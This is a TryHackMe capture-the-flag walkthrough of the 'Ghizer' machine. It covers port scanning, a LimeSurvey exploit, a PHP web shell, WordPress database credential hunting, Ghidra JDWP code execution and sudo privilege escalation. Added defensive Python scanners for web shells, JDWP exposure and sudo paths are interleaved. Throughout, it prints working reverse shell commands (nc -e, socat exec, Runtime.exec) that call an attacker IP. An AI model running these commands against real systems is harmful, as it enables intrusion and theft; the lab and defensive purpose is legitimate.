TryHackMe Ghizer

Today we are going after Ghizer on TryHackMe.  This machine says it has multiple web applications on it, so let’s dive in.

First we start off with our favorite port scanning tool, Nmap.  We use -p- to scan all ports and -T4 for the second fastest speed.  Finally, we use --reason to understand why Nmap determined a port to be open or closed.

nmap -p- -T4 --reason <Target>

Great now let’s service scan the open ports.

nmap -p21,80,443,18002,36699,46471 -T4 -sV --reason <Target>

We seem to have an anonymous FTP server.  Let’s start enumerating the web servers on ports 80 and 443 and then investigate port 21.

Since port 80 and 443 are open and appear to be web servers, we can enumerate the site with GoBuster.  Let’s use some extensions in GoBuster so we can add in php, bak, and txt for more results. This way if there are files with these extensions we have a shot at finding them.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<Target> -x .php,.bak,.txt

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://<Target> -x .php,.bak,.txt

While these run, go ahead and check out port 21.  Let’s use an ftp client to connect.  Maybe we can use the anonymous user that we saw in the nmap scan.

ftp <TargetIP> 21

For the user enter anonymous and for the password enter anonymous.

Looks like we don’t have any permissions in the /home/lucrecia/ftp/ directory, but we have discovered a possible user.

Back to our results: there’s a page at http://<TargetIP>/admin, so let’s visit it.  It redirects us to a login page located at http://<TargetIP>/index.php/admin/authentication/sa/login

We can try to log in with default credentials; after searching through Google I found admin:password.  If these don’t work, you have to restart the machine; I had issues with my first machine.

Once we login we can see the version at the bottom right.

Let’s search Google for an exploit.  There’s one for versions under 3.16.

LimeSurvey < 3.16 uses an old version of “TCPDF” library, this version is vulnerable to a Serialization Attack via the “phar://” wrapper.

https://www.exploit-db.com/exploits/46634

If we look at def main(), we can see that we only need to supply the target IP without additional directories.  This is because when we run the exploit it appends /index.php/admin/authentication/sa/login to the target.

Save this as LimeSurveyExploit.py

python2 LimeSurveyExploit.py http://<Target> admin password

I tried to upgrade my shell using python but it appears we may be in a limited shell, let’s try socat.

Python attempt to upgrade

which python

/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'

What this does is import the pty module and then attempt to spawn a process, in our case /bin/bash.  Since that didn’t work, let’s move on to socat.

First we need to determine which architecture this machine is: x86 or x64.

uname -m

I downloaded the socat binary from https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat onto my attacker machine.  We grab the x86_64 version because that’s the architecture we have on our target.  Now let’s serve it up over HTTP using python.  Finally, go ahead and download the binary onto the target machine.

On your attacker machine

python3 -m http.server 7777

In another tab set up a socat listener

socat file:`tty`,raw,echo=0 tcp-listen:1337

On the target machine

cd /tmp

wget http://<attackerIP>:7777/socat

chmod +x socat

./socat tcp-connect:<AttackerIP>:1337 exec:/bin/bash,pty,stderr,setsid,sigint,sane

It seems we may be in some limited shell.  I noticed a lot of the commands I was running weren’t working properly.  Let’s see what is available to us.

Shell.php sounds like it could be an interesting file, let’s cat it out.

cat shell.php

It appears we may be able to pass a command to shell.php.  Let’s visit the page to confirm we can access it.

It brings us to a white page, we may be able to pass a parameter of c to get command execution.  Let’s look at the shell.php cat again.

<?php system($_GET["c"]); ?>

So this script calls system which will execute whatever “c” is equal to on the machine. Visiting http://<TargetIP>/shell.php?c=ls will execute the ls command.

http://<TargetIP>/shell.php?c=chmod +x socat; ls -lah socat
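A defender's view of the same file, as an added example that is not part of the original write-up: a small Python scanner that flags PHP source where request input reaches a command-execution function, either directly as in shell.php or through one intermediate variable. The function names, the sink list and the sample strings are constructed for illustration.

```python
import re
from pathlib import Path

# PHP functions that run a string as an OS command or as PHP code.
SINKS = r"system|exec|shell_exec|passthru|popen|proc_open|eval"
# Superglobals filled directly from the HTTP request.
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
# "$var = ... $_GET[...]" (but not "=="), used for one-step taint tracking.
ASSIGN = re.compile(rf"(\$\w+)\s*=(?!=)[^;]*?{SOURCES}", re.I)
# A call to a sink; method calls such as $pdo->exec() are skipped.
CALL = re.compile(rf"(?<!->)(?<!::)\b({SINKS})\s*\(([^;]*)\)", re.I)

def scan_php(source):
    """Return (line_no, sink, reason) for each sink fed by request input."""
    tainted, findings = set(), []
    for no, line in enumerate(source.splitlines(), 1):
        tainted.update(m.group(1) for m in ASSIGN.finditer(line))
        for m in CALL.finditer(line):
            sink, args = m.group(1).lower(), m.group(2)
            if re.search(SOURCES, args, re.I):
                findings.append((no, sink, "request input passed directly"))
            elif any(re.search(re.escape(v) + r"\b", args) for v in tainted):
                findings.append((no, sink, "variable assigned from request input"))
    return findings

def scan_tree(root):
    """Scan every *.php file under root; returns {path: findings} for hits only."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed samples: the one-liner from this page, an indirect variant,
# and a benign file that must not be flagged.
ONE_LINER = '<?php system($_GET["c"]); ?>'
INDIRECT = "<?php\n$cmd = $_POST['run'];\necho 'ok';\npassthru($cmd);\n"
BENIGN = "<?php\necho htmlspecialchars($_GET['name']);\n$up = shell_exec('uptime');\n"

if __name__ == "__main__":
    for name, src in [("one-liner", ONE_LINER), ("indirect", INDIRECT), ("benign", BENIGN)]:
        print(name, scan_php(src))
```

Pointing scan_tree at a web root such as /var/www/html gives a quick list of files to review; it is a line-based heuristic, so a clean result does not prove a file is safe.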

Maybe we need an upgraded shell, let’s go back to socat, but this time let’s run commands through netcat.

First use shell.php to check to see if we have netcat on the target

http://<TargetIP>/shell.php?c=which nc

Let’s see if we can use the -e option to execute /bin/bash through the php shell.

On the attacker machine setup a netcat listener.

nc -nlvp 5555

Now in the web browser run

http://<TargetIP>/shell.php?c=/bin/nc -e /bin/bash <AttackerIP> 5555

At this point we have caught our shell.  Let’s check that socat is still here on the machine.

ls -lah | grep "socat"

Great it’s there, now let’s try and make it executable.

chmod +x socat

ls -lah | grep "socat"

Now it’s executable!  Let’s get a reverse shell via socat.

Start a listener using netcat on your attacker machine.

nc -nlvp 4545

Now on your terminal with a netcat connection run

./socat tcp-connect:<AttackerIP>:4545 exec:/bin/bash,pty,stderr,setsid,sigint,sane

Check your netcat listener for an upgraded shell!

If you check the home directories we can find a user veronica.

ls -lah /home/

Let’s keep hunting; we need some credentials for something.  Running netstat -antp we can see what ports are open on the machine.

It looks like SQL may be on the machine since port 3306 is listening.  That would make sense because LimeSurvey probably stores its usernames and passwords in this database.  Hunting around we find a config.php file in /var/www/html/limesurvey/application/config/.

cat /var/www/html/limesurvey/application/config/config.php

Let’s keep searching around.  If we cd up a few directories into /var/www/html, there’s a wordpress directory. 

When we visit http://<TargetIP> it says there’s a plugin used to hide the wordpress login page, which makes sense because when we visit https://<TargetIP>/wp-login.php we get redirected to https://<TargetIP>/-/-/-/-/-/-/-/-/-/-/

According to the documentation for wps-hide-login plugin, you can either modify the login page via the wp-admin page or via the database for wordpress changing the value of whl_page.  https://www.greengeeks.com/tutorials/use-wps-hide-login/

Looking around for credentials we find the config file for wordpress located at /var/www/html/wordpress/wp-config.php.  This has a username and password for the wordpress database.

Let’s login to the database and see if there’s anything interesting.

mysql -u wordpressuser -D wordpress -p

Now enter the password

We can list the databases using the command SHOW DATABASES;

Now we need to interact with the database and list the tables.

USE wordpress;

SHOW TABLES;

The wp_users table could contain passwords so let’s check.

select * FROM wp_users;

Looks like we just have Anny’s password hash.

We can check out the options table as well.

USE wordpress;

select * FROM wp_options;

Here I recommend just copying this out and putting it into a text editor.  Then we can search for the whl_page configuration.

Looks like if we go to devtools we should be able to see the wordpress login page.

https://<TargetIP>/?devtools

And we are able to login as Anny.

Let’s see what processes are running as veronica.

ps aux | grep "veronica"

It looks like Ghidra is running on this machine.  There was an XXE vulnerability that allows for code execution via a malicious project.  The issue is that we can’t actually execute ghidra as www-data.  I ran ls -lah | grep "x" in /home/veronica/ghidra_9.0 directory and none of the programs are executable.

Searching around more it seems like you can inject a process into the Ghidra debugger: “Ghidra (Debug Mode) Remote Code Execution Through JDWP Debug Port”.

To do this we attach to the debugger, list out the classes, set a break point, and finally spawn a process which will be our reverse shell.

First attach to the ghidra debugger on port 18001.

jdb -attach 127.0.0.1:18001

Then run classpath to know which classes we are pulling from.  Next run classes to see what classes we can interact with.

Finally apache looks like a good one according to the video. 

stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()

Start a listener on port 1337 on the Attacker machine.

nc -nlvp 1337

When the breakpoint is hit we can start a new java Runtime to run our reverse shell.

print new java.lang.Runtime().exec("nc <AttackerIP> 1337 -e /bin/bash")
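A JDWP listener lets anyone who can reach the port run code as the JVM's user, so even the loopback-only port used here crosses the boundary between www-data and veronica. The following added example (not from the original write-up) audits process command lines for listening JDWP agents; the sample rows, user names and jar names are constructed.

```python
import re

# Both spellings of the HotSpot option that loads the JDWP agent.
JDWP_OPT = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")
LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}

def assess(cmdline):
    """Return (port, exposure) for a listening JDWP agent, or None."""
    m = JDWP_OPT.search(cmdline)
    if not m:
        return None
    opts = dict(kv.split("=", 1) for kv in m.group(1).split(",") if "=" in kv)
    if opts.get("server") != "y":
        return None  # agent connects out to a debugger; nothing is listening
    host, _, port = opts.get("address", "").rpartition(":")
    if host in LOOPBACK:
        exposure = "local"        # every local account can attach
    elif host == "":
        exposure = "unspecified"  # bind address is left to the JDK default
    else:
        exposure = "network"      # "*", 0.0.0.0 or a specific interface
    return (port or "dynamic", exposure)

def audit(ps_lines):
    """ps_lines: 'USER ARGS...' rows, e.g. from `ps -eo user,args`."""
    findings = []
    for row in ps_lines:
        user, _, args = row.strip().partition(" ")
        result = assess(args)
        if result:
            findings.append((user, *result))
    return findings

# Constructed process rows; user names, paths and class names are placeholders.
SAMPLE_PS = [
    "veronica java -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=127.0.0.1:18001 -cp app.jar Main",
    "build java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar ci.jar",
    "www-data java -Xmx512m -jar api.jar",
    "dev java -agentlib:jdwp=transport=dt_socket,server=n,address=10.0.0.5:8000 -jar tool.jar",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_PS):
        print(finding)
```

Any row reported as "local" or "network" on a multi-user or internet-facing host should have the debug agent removed from its launch options.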

Now on your new shell upgrade it to a full shell using python.

/usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'

Let’s start by seeing if veronica can run any commands as root.

sudo -l

Great we can run this base.py program as root. Let’s take a look at what it is doing.

cat base.py

This does not give us a way to get a root shell without some modifications.  Since we can’t edit it, let’s just delete the file and recreate it.

rm -rf base.py

Now we need to execute some command from python that will give us a shell.  We could get a reverse shell, but this way is easier.

echo "import os" > base.py

echo 'os.system("/bin/bash")' >> base.py

Finally run the new program, which will spawn a root bash shell.

sudo /usr/bin/python3.5 /home/veronica/base.py
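The weakness used here is that the sudo rule names a script inside a directory the invoking user controls. As an added example (not part of the original write-up), this check walks each path in a sudo-permitted command and reports any component a non-root user could replace; the filesystem layout is constructed, and root ownership of base.py is an assumption.

```python
import os
import shlex
import stat
from pathlib import Path
from types import SimpleNamespace

def risk(st, trusted_uids=(0,)):
    """Why a non-root user could replace or modify this entry, or None."""
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group- or world-writable"
    return None

def audit_path(path, stat_fn=os.stat):
    """Check a file and every parent directory; a writable parent is enough
    to delete the file and recreate it, even if the file itself is read-only."""
    findings, p = [], Path(path)
    for entry in [p, *p.parents]:
        try:
            reason = risk(stat_fn(str(entry)))
        except FileNotFoundError:
            reason = "missing"
        if reason:
            findings.append((str(entry), reason))
    return findings

def audit_sudo_command(command, stat_fn=os.stat):
    """Audit every absolute path named in one sudo-permitted command line."""
    return {tok: audit_path(tok, stat_fn)
            for tok in shlex.split(command) if tok.startswith("/")}

# Constructed filesystem layout (uid, mode); uid 1000 stands in for veronica
# and root ownership of base.py is an assumption.
LAYOUT = {
    "/": (0, 0o755), "/usr": (0, 0o755), "/usr/bin": (0, 0o755),
    "/usr/bin/python3.5": (0, 0o755), "/home": (0, 0o755),
    "/home/veronica": (1000, 0o755), "/home/veronica/base.py": (0, 0o644),
}

def fake_stat(path):
    if path not in LAYOUT:
        raise FileNotFoundError(path)
    uid, mode = LAYOUT[path]
    return SimpleNamespace(st_uid=uid, st_mode=mode)

if __name__ == "__main__":
    print(audit_sudo_command("/usr/bin/python3.5 /home/veronica/base.py", fake_stat))
```

Called without the stat_fn argument it inspects the real filesystem; the fix for a finding like the one above is to move the script to a root-owned directory and point the sudo rule there.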

I hope you enjoyed this machine.  Just remember once you compromise a system, be sure to check what other programs are running.  There’s always a possibility that there is command injection in a custom written script, or a way to just delete a file and make the same one with your own code.